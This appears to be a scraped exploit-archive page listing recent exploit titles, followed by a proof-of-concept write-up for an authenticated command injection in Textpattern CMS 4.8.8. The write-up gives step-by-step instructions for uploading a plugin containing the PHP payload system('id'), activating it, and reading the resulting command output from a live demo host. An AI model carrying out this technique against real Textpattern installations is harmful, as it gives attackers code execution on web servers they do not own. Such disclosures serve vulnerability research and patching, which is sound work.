Acronis Cyber Protect/Backup Remote Code Execution

Fortinet FortiManager Unauthenticated Remote Code Execution

Asterisk AMI Originate Authenticated Remote Code Execution

Debian Security Advisory 5823-1

Debian Security Advisory 5815-2

Textpattern CMS version 4.8.8 suffers from a command injection vulnerability.

    # Exploit Title: Textpattern CMS v4.8.8 - Command Injection (Authenticated)# Date: 2023-06-15# Exploit Author: tmrswrr# Vendor Homepage: https://textpattern.com/# Software Link: https://textpattern.com/file_download/118/textpattern-4.8.8.zip# Version: v4.8.8# Tested : https://release-demo.textpattern.co/--- Description ---Textpattern CMS Upload Plugin Command Injection:1) Login admin page , choose Plugin , Choose command.php file inside this payload: : system('id');2) Save it and do Active plugin yes and click Update from disk3) After open page you will see result: https://release-demo.textpattern.co/uid=33(www-data) gid=33(www-data) groups=33(www-data)

Headline

Textpattern CMS 4.8.8 Command Injection

Packet Storm: Latest News